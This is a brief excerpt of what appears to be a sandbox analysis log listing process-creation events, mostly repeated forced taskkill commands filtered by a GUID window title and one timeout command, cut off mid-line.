Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C